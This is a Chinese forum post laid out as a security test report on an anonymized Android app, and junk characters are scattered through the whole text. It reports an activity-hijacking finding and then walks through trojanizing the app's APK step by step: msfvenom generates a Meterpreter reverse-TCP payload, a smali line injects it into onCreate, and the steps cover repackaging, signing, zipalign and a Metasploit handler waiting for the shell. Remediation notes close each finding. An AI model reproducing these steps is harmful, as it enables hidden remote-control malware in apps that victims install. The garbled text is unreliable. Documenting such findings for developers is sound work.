) h/ q' F" e) m2 } ( A/ |% O! c, x0 r/ Z 1-2 测试结果 1 T6 U& C7 \7 y( V3 i8 V. r ) {4 E; Q' w" C$ p. K6 y0 l

4 g6 X3 Q/ D* q7 L; ^ A& M+ O/ y! P, d+ }0 q

/ G, ^; h$ {4 L1 a$ K2 ? ( p/ B* a" ], c; D: }   9 D! P3 [% d$ t1 [- P 7 ^8 ]+ j E/ |% [5 {

0 ~, |8 w' g7 P5 n: k- ?1 R( G m# U& g2 {) ?) M

. W `5 t( I9 w5 g8 D 4 g# b8 m, N/ O2 X Y. {' p 2 检测结果                    : Z& p& H3 F1 b; R 5 f$ p N* W+ R' S+ P. p3 I4 G( j

! M$ \! f- x" ` G o9 I: S# x; {$ p! Z

6 V- D9 J* g( J& h9 F 0 E- j! l z: ~( m, Q: ~ 2.1 某某某 " c, l! L; w6 L1 [ ) a: n& [( ?, C9 O

/ y) @" N$ q0 M* q% Z, ?/ Z v( b% U+ \ 0 f2 ?) o& W! O+ j; C

0 c0 _ M8 N1 n+ U$ L. X3 Z: o+ z% j* _9 w9 ?, K5 X# a b 2.1.1检测目标 9 l4 p2 z ]- t2 n3 s & s* T) w9 L! M3 U9 N( Q& [

! C% I2 }' Y4 K6 {; T. b$ w4 O( [" s3 u. z6 X4 l" d: W" m2 p* j

2 @& w* K- m7 {/ p; ?7 J. g + e6 `8 R3 U0 k3 U7 ? 目标地址: 某某某某某某APP % u+ J% g; {* {: H) X' r( M( g : z+ \$ q( o9 `

0 H! b+ {) W; d) U* q) M9 M2 W. x! N$ y4 R" N6 e" H$ i% u& w( }2 p, Y' C

$ M& [2 f+ b4 Q% s/ _! F+ |/ X& V! G+ R0 d/ n! V5 V 2.1.2检测结果 - r' ^+ ~* L9 f7 r ) Q# [( _2 t5 [- C

4 \" e3 H: K4 G% _3 n% V7 ~ 7 I& d9 T6 U6 j$ @3 ?5 R

$ m. s3 e1 a j- } - n) f: |3 i+ N7 k9 Z 2.1.2.1 $ ~1 W" {6 o+ \! g2 m4 q & l- M* a% G9 p" u# `: d! v

# g7 j: C1 y1 I+ K5 D3 L * u" m! F0 I0 m ^

' m4 ^/ `: K! w3 \! t' B; o3 z* H O7 ]; J 漏洞链接地址:某某某某某某APP : o" {: `4 v* p W 8 p" z ]6 d6 Q& x) [1 b9 q

9 Q) z1 v2 |# y" M ) L" h- Z7 j4 X4 W! G* N

7 I F3 }- X+ n; f3 p0 {* l& M- t/ R" B   5 `0 f( n3 t( R+ e. d6 s& l: }8 F: H6 e, [, _* a$ s! e. b7 P

) R& X( n# A" @7 Z# s2 G ' L% m1 x3 M: T7 A" N9 F

. ~6 P1 [, g, `$ \6 v8 M( [2 j 0 d. k/ h/ h p: G9 G 漏洞分析及取证: # i: \% \3 l1 P 3 G& K; n* F6 s: [

9 [1 u2 X1 L. d; w. F5 ] ( M+ m# K( P8 ~6 c+ A+ {* q

: z0 o/ @2 N8 k+ g( R# u, g6 ^ $ f/ d+ g: I0 \8 L9 z1 P                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: ?5 I/ \( m1 P$ m) O# A# S0 E * T, f- E$ h+ X1 e/ o

2 n9 q0 ^; {8 n3 s% x7 x: y/ F! p/ c . J$ L: P w9 D

+ b) H/ \. M; c, r9 q5 H1 G+ I z& l/ _) W      1 x1 R8 Q s! t; I/ P$ O) m- l. @) |1 c, G

3 E6 }/ i) s" ~1 W 7 [. ]+ l* t' E4 v0 S) p0 C4 U. D3 a

+ c2 W4 P$ r/ ~* j8 v h# s: {5 `4 h% x                       # m9 q0 ]- K5 y* t) l , H! T3 ]6 L6 L. r

: F% b$ X! f8 ^: ?) r* O* G ) m- A0 Q/ G9 v+ d. q' x+ M( R' o

$ a& e6 k( @3 v& G& k : b: h& `; J' ~, c# h+ e 9 y8 c' d' G% I1 k- i * s, B- {2 c! z! X" Z! j C

& b$ q; d! }. n& p / x/ e: s- v5 p# T, Y

. Q- \( S$ u$ Q( S3 _ . o0 i9 D4 O! W. v7 h3 ] 3 x; g. Y. C) | - _, l) t9 Q9 f) [

! [ S' x0 @- K. M: {7 ?7 E & F# J( y# J. Y, E. Q8 n7 W

6 e9 X3 V j. B" Y J6 K. x& e' ^3 f & t4 V4 ~7 z# N, L* Z b ; N- i9 ^8 V0 ]' U7 G- N4 p% p; k) c0 i. p0 c8 l

! W5 T# U+ r: h8 t2 @& H! C( X+ } ) n" A& F, O% @! T. _& H9 A: i

$ r0 K |- t) G# b7 m$ c ; ^- e( V3 ~" J6 z* ] 漏洞危害:高 3 u5 m9 y- z7 {5 h * u, n D/ y( ~! X; O) i

! n3 x" r& O) E: l1 O \# M% c0 k0 @ 4 a3 C- {: ~2 N# h/ L3 J" W; `1 ` K O
& t$ Z1 o# B2 V2 e- O; T& z0 k: B1 Z 0 @" T: x+ O; p l4 c! T 3 z( }! w- f$ c' [! E% b. b* k2 B, S! p- ~7 r6 Z# m$ n7 r' r$ l/ k% {) b6 N" g9 S3 Q1 w" A1 t. M$ R) y* _6 U; y5 P- G, N2 M0 M N% g( |- i# n; P& v W8 p& V1 a$ a; J" |5 A9 s$ h& N/ `- _- s; X/ d6 x! j' H8 c0 G' _& n5 z3 \0 w" ], M9 j1 y3 g' m; t9 k: L# S5 T* ^, K% y* c; M$ l# S5 m3 H9 {3 D& u' Q' |/ P* v2 m; u N9 E8 o: F4 E- K! a: U5 R! k% i! S3 o- Q8 X* A5 [; O: z: X9 i/ N4 ~6 \/ N+ ], T C0 X, x4 n* `3 V3 ^/ [- B* g% I# s- L1 \& x- c& _) A& _* R6 X# s1 r ^& x: ?+ p6 n$ E8 X$ B- v8 \1 F6 g, C# m! T5 O8 a2 A* ^& x L' L) K+ w0 s" ]( |, w% Q) M0 E8 c: t: s
7 H* j2 [9 U! x, J2 K* z+ r3 C 2 Q! G) v4 V8 t% \* ^$ M

, C( i# [$ N# ^- h : Q" j* c X# R8 Y 严重程度 ; l# M, O1 i" {) q 1 ]5 J* |/ ~2 L* [, i

7 b; e; }* o! l . \; y6 {) e# O4 ]) I. N( L& U4 Y 		2 @+ ~( e, C4 o: J% ?/ P/ s5 h3 I3 t1 B) p

2 C9 W. c0 o$ Q4 @ B- N; G , Z! P+ U C N 9 v% @ H7 W0 {5 K0 z# C( t* m7 R/ @3 D, F$ ` G/ F' z- P$ }( C

8 [. t, h8 q+ m* Z* x( Y+ `# e* L7 T6 c \3 Y% ? 		; L, W7 G2 Z# g4 w% F2 K* g/ T! C % a- B/ O. F9 c" |7 B3 ^7 B7 y

7 T1 W2 x+ `3 A7 Y 8 t. h( b+ e" T3 [1 P& s( T 5 T9 n( V( O, W5 X1 y, r ! {' b8 g0 E/ j' z

5 h0 o' I: Y4 U3 |' ?0 E, o 1 C3 R/ m( [3 r' K; C4 y7 H 		9 N& @: E+ i% O5 f4 i & [ M" y" G4 i7 r4 l/ b- x

7 b7 [; z9 Z, I1 b# L - `/ P' M; o: N 0 D" Z5 t9 I( w( p, c8 B2 D* S: f2 [7 f0 Z) p* P" w6 m, b

' G1 X9 p2 W$ G q # ?# A3 e) C* P+ e% U5 E 		" g; T0 l8 _3 Q " @8 G9 d% N; G, X

9 m. m. Q$ L1 P 4 b* p& D8 X4 m' x6 H" N8 U+ N, n   ; `) F4 B: Q- c2 C* c & T% R9 U# g9 w# k! z% H

1 V6 L Z) ?8 {; \, I: O$ |# _" |! x8 H, } 		0 i0 z3 O. }& D7 | ' |! l- A- K7 x* d* b8 N

) b0 U6 n4 R' J - Z. U* I8 e& m1 t% c' d& C 6 v3 y2 B9 D9 L; V. f% o # \2 Y# P2 @; }- h

9 v! ?: f/ M' B# ~$ W. ]# d _0 h, }; U) U( M) ^ 		4 L" I7 P2 i& \/ D# z ! E, E0 f9 ]% G, D; Y" R( ?

9 @- G" l3 l5 K7 b 2 \' n6 X2 r! ?3 X: `/ B/ l( [   % y; R8 e( ^. {4 d/ g/ ^0 Y( f # f% {7 F; B8 e0 |6 t" P# `" {

) T4 j6 e" j: d% r9 j* g! [. F8 O4 y( z! ^1 c* y1 C
" M w1 _& Z' M3 ^- C. D 6 u! ^% q" z4 n1 G$ R& I
, ?& t: c. {+ ?' g: @; F* u & E# S9 I9 B1 M& C4 ]

2 D. Y- Y: S* i, Y+ e1 h2 A ( a( Q3 l0 C1 b. R/ C# U( [   ( `2 _$ V8 B) @! @# [ ! D( f& S3 e! l# ^# V6 N

. }4 y! L, ?; q/ m2 @! C1 I b \' h2 r* a

/ d: r3 w' C* }7 x. @# a/ B) h) d2 Z3 x0 }/ l2 n( o( d 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 9 s F( B" a# k5 o & ~8 x# D& Q# U( {5 p

5 C- ^' ~: d4 B6 \) ?9 s( X/ R! r! y v& {- s' B6 J2 z

1 L7 ]5 n: P/ Z + {' ^1 O' u' C           2 {/ z# P$ g: ~! H7 X& b 3 I3 I! ]$ Z7 W4 a

( C8 h4 C& p. m+ j5 g- @1 ~ - E$ A" ^. A0 f( @- A

6 I6 z1 b' x5 ]6 l9 n# p9 U( {& m( q' F7 L   9 U( W3 L' g7 ] c! B2 p2 o; d& O. @ N

8 O- t- B6 f. M* j" j2 Q* a! O) Z4 U! U4 y, u7 W/ ~/ y

- p) G1 ^( l2 n7 D: ~ + y+ B& k$ `2 R3 k, z& R" g$ U 2.1.2.2 : j/ k* b% J$ x: k # P( v, E- S/ P! ^, d8 ^* S2 l

4 v1 h% a, r- w / r1 `! k3 N4 N& ~: Z4 w

! T6 ^9 M) U( _0 A6 K# |7 D3 z. N! E# \# J 漏洞链接地址:某某某某某某APP 6 P/ V' _6 v7 v" H& L ! @5 |1 b5 ?, ?! B( i6 {) v

- R2 {0 C/ C G6 s$ X8 H: }: Q - n! [( ^& z/ p6 f' @

( ]9 e1 B$ a7 J" n9 g0 W& P% X0 o + ?' _2 m: y# ~ 漏洞分析及取证: 8 `0 _- I n+ `+ |1 }$ ?! Q7 B( z; M0 C# [& I3 o

6 c- C& F5 Q0 K; S! s * ~, @& m( \7 {1 s

" g5 V. h; p) a' k R9 u, l. d" Q* ~                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: , h8 s1 L& i4 d- j & y0 t+ q6 B: j, s# d* O8 G3 x

* r1 b" l9 ^& z 2 j5 g W% S/ [; T5 f9 E

5 r& ?- O" [# N . o, a( N" d1 B8 A Metasploit 生成木马 apk : T ^2 I3 r: L: C0 l, \0 \& J1 I$ J% Q9 ^; Q! q5 S! [+ ]6 _

+ X z: S. t: Y0 I, _ : N( K; n% U, m G f; j# `3 w

2 q: l' q' P9 p5 w) h1 s# d : N4 y! Y. [% A! U% _4 | g: @ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk ( `. J( O, C% p# v( V2 w 7 D4 e0 c; u8 \* E7 b

/ {( ~# h; J3 D7 `/ T ) l9 X0 q X7 ~! v

/ f) a& p4 U2 |& g( |& ? 4 c+ G5 C$ t, D 反编译目标apk和木马apk 5 E1 w! t" b! w* F5 O, @0 _. j' {5 k$ L5 T; m2 l/ d# D! E

! q& k4 v) _: P# e& ]# c 4 Y1 c! ~3 k8 o4 o! X

5 k5 Y( J) Q1 M' `/ c7 x $ w- U8 E7 D9 @% w apktool d target.apk
" r$ \4 X: ~1 D! Y' J ' I, }2 Q' {) W; g8 k$ n apktool d cockhorse.apk , a j+ S/ { l+ p6 E& t0 u - G2 @9 m5 j& ^% p# N' a, X; g. w

; {* O7 a* m- D' Y6 v8 v 6 ~+ P* G! u% B: s

2 Y# g b- h7 C . f) T U5 K, f0 ^& S 木马 apk 注入目标 apk 5 B, }' X2 Y% ~1 W8 i( ?& J$ o* z1 {7 E1 A% K8 ^$ G4 ?6 H4 E

7 {2 q5 i/ H8 L/ o 5 Q% b: ?+ B0 E/ L0 F4 I

% r( W1 W% H" [' o k5 d; E! I/ ~" F* ~+ e) ?" ~# z3 E 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
0 T/ W Q, l/ j* L+ {$ | . _, L5 e$ C, d9 c, Y invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V # h* `8 G8 v1 G' b - e; V: @: |% v8 `

+ t! M& e. I. G 0 ]5 |9 D% E9 S( a

( L! ^! U# g' Z$ x: [) e O# D . {8 R: j3 l$ U1 D! n) E" O 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 / v5 O9 @9 a, e% f( B( e4 {% v5 ] ! K! z) r1 e; \* Z% @. ~" _: I

+ X& {7 D; i3 `& o* V1 s/ L ! z9 x3 _6 G/ W6 i$ w7 {* l

$ y) T4 [# }: t9 C, T- y' R - `7 U! X9 t! E- V- T4 Z; m 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ ' c" h" }/ |- a' f- m- } 3 W% W+ J( X, P0 u x- L

/ ~/ h, b0 P( N! J' `& Z 3 l3 N4 M) m/ a# U) t [! t

8 {& @/ G6 v9 s: y* _" O6 F$ p + {5 w* @6 |$ V! c* A 回编译生成最终 apk 1 F) M( M, F! F6 Y4 e, d! U$ }, x; c( n/ m* j9 _& E

7 ]! L* G4 l& I$ w7 \ 5 F1 x9 g$ W5 }! z

( G/ G7 N- G* n9 g7 w; V- f9 J; Y( e0 } 重新打包 4 d) A4 `! o- M- n/ ^+ l# Y9 ?, Y3 I. M2 j2 [( ^

& G" D6 S# {4 x8 I" O2 m- r% {6 t9 {! r4 }' V5 o

3 m s9 Y. R' b6 d3 Y $ A- a2 _8 _' {0 s/ N6 F apktool b -o repackage.apk target_app_floder " W2 Y$ y7 y, _$ [9 I3 z 9 s2 Q% b+ T; q' B% s: ~

' U' Y" O7 W' a! b1 c# y/ V + a& c" m) @6 F+ i. \* o& a

3 U. L- O, `* K# ^# L3 O) ?5 [ % j% ^8 u* y/ U5 E 创建签名文件,有的话可忽略此步骤 2 e. q" s: L& b, Q3 A6 \! H3 Q7 t. V1 e' H

! Z& q4 z+ p& o: Q ; J5 D; b/ c' H9 h; N. i+ }

0 M: f+ p( R j1 J ! } j0 P3 n' q9 {1 I keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                w+ U9 N! G8 A. i; g , ~9 s8 @) C" [

& f. ]4 o* ^) R7 R* k9 ` , r- \6 b1 z' b/ y2 c

9 n# H! U9 H& \; ^+ [ & N& p9 C3 s' M7 Q& ]: ?( @ 签名,以下任选其一 ' h# f( r) o$ O1 }; s2 z5 {1 D* v' L: H: t6 k; D

: R. Z' D7 J( `$ s) @- S/ n9 K; ^: u

6 }' b' ^+ Y+ Y) b: y 0 b/ ^- v( @& T% S jarsigner 方式 : u" s9 m4 L. E- N' r 0 o: J- j7 l a; e

% A1 B# F& H0 }6 _0 z , Y; L: q, H, h; R+ u7 H3 F

* M7 O/ ~% B6 B; X$ @' } |" ]$ {* a" e' ~" ]3 \+ p, }2 n4 ]6 n( h P) o jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 8 L+ _/ G \9 e5 k N , x ]. Z7 P8 y/ L7 t4 F# a0 z; r

( ^3 k8 X! R2 ~* t8 j' p' f: q 3 |/ i T# l# S2 V* k5 r8 V

) {: Y: L, d- T! D ' H* ^, I2 x& X% l: P3 \ apksigner 方式 * r, c- d7 U: @: q3 a) d i6 m7 C* X5 h! |

1 V8 c4 N! r' Y; i: H, R$ `$ a, |, t+ u3 D

# o" q0 B: @* [$ Y& @) I4 ^" a( Y/ r2 m2 I apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk % V+ f' ?7 Z( P6 P+ \, J0 ?- r ( Q4 u" w" g9 n( e

. N7 H3 r; X# @4 F! { 3 X9 h! ~1 H5 k' H' ]

, J& j, K4 V8 l/ n: ^2 }/ U9 {* G 7 P5 A: b9 J; S 如需要禁用 v2签名 添加选项--v2-signing-enabled false 4 @# f5 e% L5 b$ M$ L9 h" h ]* v 5 o1 q* L7 ]( F9 v3 _1 P: F

Z. y O% r1 d" w0 i- R2 H% S8 L# \0 a& h1 r" G! B

+ g5 r9 V: i5 z" m) E ) C1 c* h0 M6 a9 g" \ 验证,以下任选其一 % p+ \5 x, F* Y& N3 y. H9 C 3 V! @7 d0 @- K# i3 e

8 W* Y5 b5 C0 d5 G ) y$ o$ A( E! `; W

6 ^9 \' f6 g! O; n $ }/ n4 f- i2 k# d jarsigner方式 , R( u7 C5 d/ @8 {" A 7 \# q2 c. N- q9 ~

- J9 d" l& [/ }$ H& C i( `+ t. u2 h5 P

' W- Q, I- [6 P6 O# T9 ^9 V7 E( m! X; ]& h( _6 b jarsigner -verify repackaged.apk 0 y. z: d& ]/ }2 o1 V K) L & N4 w# O* K2 r Z* R" `/ Q2 |

9 H1 q2 [1 Z8 X. o ; F% H8 f6 ]1 t* }4 n0 P2 R

8 ]7 H* ]3 L1 D; U: V1 ] & z ~) g4 O% W" P5 x apksigner 方式 5 I; t0 F* K2 ]' Q" W$ O# W& [) ?8 ]* a% I# `# }/ c

8 L5 [9 ^9 \! `- a! v, _ 8 w9 v+ X1 P. D7 _; P

. j+ Z4 V5 b5 q K9 G1 i" Q# x! D5 U! G& \# b* j. J apksigner verify -v --print-certs repackaged.apk # k9 X8 ]% a" s$ f' K6 E ' u D* ^. |( C

0 |% X/ \' W. h7 ^. C2 c+ D3 p: N$ h# @5 f: k6 Y, D( w. E: `3 Q: q# x

6 s6 c6 m, k- y! s ; ~. S( _6 S/ K keytool方式 # j( h7 x; m3 ]4 l0 h, r " c e) O( `4 |' K4 b/ |; \

$ A6 v8 L* o6 K( n1 U: E3 I 2 }. I: m3 S% Y5 k+ ~

' n) Z# @4 Y6 q T4 j& c6 W " v/ } e' } W9 P$ {4 h7 b g keytool -printcert -jarfile repackaged.apk 2 R! x) s* p- T1 D( T1 E % l5 V- Q, p6 |3 K4 V- X9 V

+ N# Q! ^% {1 u B! h; a) Q0 Y; Z8 C) L1 z6 K* O" x

* F+ P' {3 a1 f* a' L3 Q 2 A/ r H2 C# W- y/ ^7 i 对齐 3 y& u6 \2 v/ r: U4 e, A9 F* c( ] ( r- @0 P; i5 y+ T

0 C. R6 W1 @% W: ? 4 Z% ]& ~: R: y' w- m5 D

* |# Y4 n: J% p" b9 f$ h3 h8 r& j, g+ n! |9 Q+ S) v7 h0 d4 E 字节对齐优化 ) b7 h* x, |% u/ I3 o! t + J6 N+ i1 v9 [

" y0 @" ?; J, W& T$ `3 L# r. ?+ r8 J# B7 x3 ~ Y6 B

2 }: K1 p- g' i1 D . x2 P1 H" H: P' y# e$ \ zipalign -v 4 repackaged.apk final.apk / v& X6 R; A! T% g6 c$ V* o( |+ w2 Y# K7 E1 R* V% \

) D8 S8 J' r# z% k$ L3 i " k$ Z0 c/ G& A- p$ [8 D1 O

/ T9 f6 d/ m8 f4 E5 P; _. U9 \ 9 T- Q3 g& ~# e4 Z 检查是否对齐 $ e- R9 f, j# ] $ m; `* e/ W- v# u1 N ^: K4 D9 _+ v* k

8 H) T+ _$ @4 t $ R ^9 ?3 c+ a- e7 I

8 v# D3 G8 y1 i : x# o5 B9 u2 w, {# U zipalign -c -v 4 final.apk : g b3 ^' W2 B9 e; O; ] 2 R2 N4 `6 h2 ~& ?

) {& Z& {4 ~/ @. @, l( c' \/ M* h+ ? i( d

! N# P! X4 C5 | |% c0 ? ; D! K+ M+ t0 }+ ? ~ 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 ) i* e2 Q# [& E 4 E: {! s9 P+ L2 G: ]4 R

, t4 g1 V# i; K; g % U) y1 w3 H3 M

/ w% ]4 ?% W, Z& L/ C! [. G3 H ! `$ l0 L- Y) Y( y 启动Metasploit控制台,配置参数等待上线 . K8 j2 Q6 m0 `) [( J. j/ |2 N , a! {7 M9 X2 n2 K' B

5 H9 ~6 |" E$ O+ F0 \" D' d" `+ r+ O* J

- A' O l$ p* U2 X7 S+ O. o 7 B0 y0 m' e, [ h1 X8 o, Z0 v$ E 在终端依次输入如下命令 1 ^0 z# Y' t7 _5 x! _ . V4 l, j: w; x2 R$ d3 a5 t a

1 u& n! |( o& u% H% ~ 2 x- G s9 J: I

: S2 h1 ~, E& i1 u8 Q8 J3 R+ [" X; v7 v i msfconsole * |7 A0 P( r2 h+ s 6 ?4 ^2 e% p* Q4 k- f

# D, A3 U( f5 V+ G/ X& |; o , O, k4 P9 Q! G5 r( o

2 O. a6 l* Q) P) B$ V7 i" r; u& m 1 b7 X$ a" i$ {' U3 F/ z use exploit/multi/handler + u/ `) S. z# C# e& k 9 F2 d1 s" U7 ?( A( D) U

" m$ W" F1 }# {- s5 p% @) L" N$ e4 [' a+ @- x/ o

$ V" C" o: N# V : r/ J- N& z3 o( ? set PAYLOAD android/meterpreter/reverse_tcp 6 `& Y0 D' A2 _3 K4 I 1 I7 s) R) r1 E$ q8 ?) M9 ]

% x$ s, w5 ^' [; ]3 R0 c9 D# q5 Q5 ^' n6 s: ?% b

3 l1 I6 o0 s7 L+ H 8 g/ v7 f2 O+ s1 p6 R set LHOST 192.xxx.xx.xx 4 \7 P+ p% I7 b% {) u' j2 ^7 N! }8 {" S$ D: ]

, R- e7 @) t' b" ]9 [5 b" N 8 S% q/ m, A0 M D* e

8 _8 a z5 Z* s* q# G0 g4 c [# [3 U S' p set LPORT 4444 4 {7 R- f) I: b/ v 8 |. v' l/ |. b7 e1 d

" j, U( A1 V0 L/ B& f( R0 A/ e5 I+ G- J7 U }( |* h

' M" K( O U/ l, v7 A# X , H4 |+ p2 y4 T exploit ! M j* W9 K( w2 y7 \7 R& O- T2 W& E; P# k

+ ?& g) N" R( t0 X( J0 Y: H& S ) B+ P& H \5 P) T+ Q3 D% [

# i/ ^1 z9 J7 b) y& k1 f3 ]" t- e. {' ]) |# s/ e 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               . R, I q) g/ Z! z; G ' {; O2 N1 V# _3 g7 S* @9 S

, ]+ F' G; g( d R) [( R0 k1 _5 i9 |2 V. h9 E/ G

, B. N$ |- e$ B9 i' j7 g , A0 v6 V6 D1 R9 |% I* p1 ]) c 漏洞危害:中 " F: p( n6 z: x* T: x t/ d, g : F5 y+ W. b* l

3 F) x8 Q7 k$ H& u$ @. }4 c; _ 8 M: o9 `. Z' D& W4 m, x
. |$ }( P' g" h3 O, _/ f6 u- { A3 V. d$ F; {& j6 B# T 6 g, \0 Y0 M$ w: ?0 f! Q u- O 6 B" b" D1 r- @ l B' c: V K& H( w, D9 }7 M3 U5 J9 t6 x( p) J" Q" Z$ g, m0 X4 e' l5 S" ?$ n8 W6 e2 C& A7 Z) m. k% i2 H7 {5 G U, @. B$ z- g2 ~5 c! j( L, e) `6 d% L8 X0 h6 ]7 P7 H( W5 c2 f& f' e! z$ v6 k- Z3 ~+ c0 v4 Q8 l8 V( m: V5 r! A$ f7 O) s C" Y5 b; M- p, ^; y" {! k+ A. y; N5 m! v3 i/ ~* P7 a/ k) G) v$ P' c' b8 v* a* f+ P. L' _1 r8 r! h" v- t2 |8 [8 U4 O( x4 R7 a$ d- B/ K% k2 `7 q6 E! e- I6 ~4 t; d' F$ l \8 L& }# L* E% E; b6 E. x# t+ f- E* c' s4 P' {0 e0 }% x9 O" T. u! ~' u4 b% _. y5 H) u0 }. J! g6 F: X3 `/ i" A; c. z8 Q1 O( p6 R7 s. B9 X( B9 ^ a$ u' B) x
* @2 E0 A6 P0 a; G( }- g% l3 {5 | ! D9 t3 w5 G% r

4 A9 E8 R$ p2 P % S1 n8 i% ?; B) N8 N( y" \ 严重程度 . v: s' g P' U2 D. Z, I. H. B 2 A( @6 K! ^. w, |1 h

1 k5 A9 E" Q$ ?, z * k( }" m2 v$ s/ x 		) P8 \) `- i1 |4 |) v" a$ a+ o3 t , w8 N/ F. L/ ^( x% ]7 f2 I' X9 B

/ _$ T T2 ^# ]& r L6 P " y$ z7 r* n! R 1 U, N( K8 B3 r0 p' _$ Y6 I5 o& f1 [; ^0 J

\$ `( J$ L! e ! s+ A& @, Y/ s; S& W0 L 		! Y& g3 C M) [1 l! F+ _! A0 o1 n4 H- F

) `& ?/ \: n; w" O% A2 q4 M+ j {1 q ; w9 F" w; e( a3 E1 ?5 {+ v, H* l' N+ }

2 J; w( L4 l) G0 T; u; L/ g1 w0 w# K 		* n0 q9 W% F. k3 c' J% X 9 }$ ]# ~1 [7 S9 c! s

) R' o b, e1 u ( t$ }! y; g- R r1 R , |% ]1 x+ G N3 G0 j* C& I , L; k* o% A* l7 q& x

, U( p3 s5 G1 R- s# h 3 o% V0 U9 E% V$ f2 b* K; c9 n 		- g; ?' E& m. x 3 ^! @( @! s% x" P" e5 M0 o # A, p' [% f1 }3 q5 E6 O0 Q4 x$ A( \% F+ g" G. X- V$ I

: T6 s- ^+ q4 R+ h 4 j5 G5 O. w7 @4 M: A( @/ s9 w- f   % e) \; q+ m1 v g, D9 P 1 g5 @/ ?- s) {' J4 b2 V$ f

5 ?! O. n9 A, h0 q6 N6 v , h6 n( Q& o' G3 z1 _0 k, Q5 T 		8 q4 @9 ]1 z" o" W# H, O9 ^- X- r# l K! c

8 U. r0 c* g4 K' E" |8 b . r& Z! {+ W! P ; M& L+ F: |2 C$ y5 J& w: t1 |- \ ' x7 H( t* s/ w4 B* h* ?/ m

' {9 f1 c; y- g: I6 F: r5 L! E. {: X 		" h6 s9 ]7 e! l* J 7 W% o1 @! F) n5 v6 q3 a# Q9 O & ?( x6 P- s" q7 c2 Z+ @; p; h * L' k/ R g2 ]- a8 i

9 [3 O4 ]2 ?+ J* A- v# s& {, q6 K 0 e/ D, Q5 b0 E8 G0 E6 R   ) q6 t# O: E- j. _ 9 Z4 |# e. V5 U8 u

( [' o0 g+ _6 j& d( p: P 7 x3 p! o; |- g: U$ a. u) |6 a7 V
( O5 |) H0 f D5 \2 t . C$ l9 a6 M: b' W
% j% b9 M9 W" R( O& }: t. p; Z: E$ w* P5 J

7 S! {- N. A. L' c 2 P1 X) I- \0 K4 a# w: U   0 M3 d% q5 D6 e' o2 s+ S; G) c* j7 x! R

1 J2 o9 Z& y0 u) h, }8 E s L5 m& u6 z4 A# d. n

# ?7 i8 A8 z. b4 [8 h7 D6 W$ v 2 W' V9 F+ n1 O3 Z; ^' d( i 修复方法: ) a8 a; k" `" ]$ S# C8 S1 e0 P! v1 W2 d

" w( h% m; G& C- w- l z# t / v* J& [4 b4 `8 h- p& v( R& |. a% O

. u+ [8 ]9 n/ _ 6 a% i g) Y R1 j               1. APP 启动时应做签名校验防止二次打包。
$ C9 [1 ~; \$ |, @* O- W) Z% V 1 h9 ?8 k* _ X h/ c) x 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 1 z( B, R2 Z' R; g( x0 |9 y9 T6 ~# u$ b

5 Q2 W/ G- Z- _1 h5 g % y$ l2 f- n, x5 ^ & t, m) _! C8 ]7 }$ _2 |( ]2 P3 U

4 ]" w& F; u3 f' J6 j$ u ; b5 G" B' h/ z7 Z( \6 C' C4 U   8 P( \, d/ } f+ ] ~: M : X* o2 w& I$ ]3 V% i; c* ^

- w A c/ }) q d# U% W- [4 s5 n # e/ L8 g, Y6 q- \; o; ^ ! P" {, Q: U+ ^' r ; k& C1 Q; k4 Q+ k/ l; z+ p6 Y

& h- |3 _2 d! \4 T( W7 [& c 7 ]4 F: q! |+ w( x" d
9 R3 L0 _+ Y; x4 S / A6 t8 ]4 m* g9 E/ Z

, T+ g6 t7 P2 W7 C 5 q( U/ m7 U# [# r5 j
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表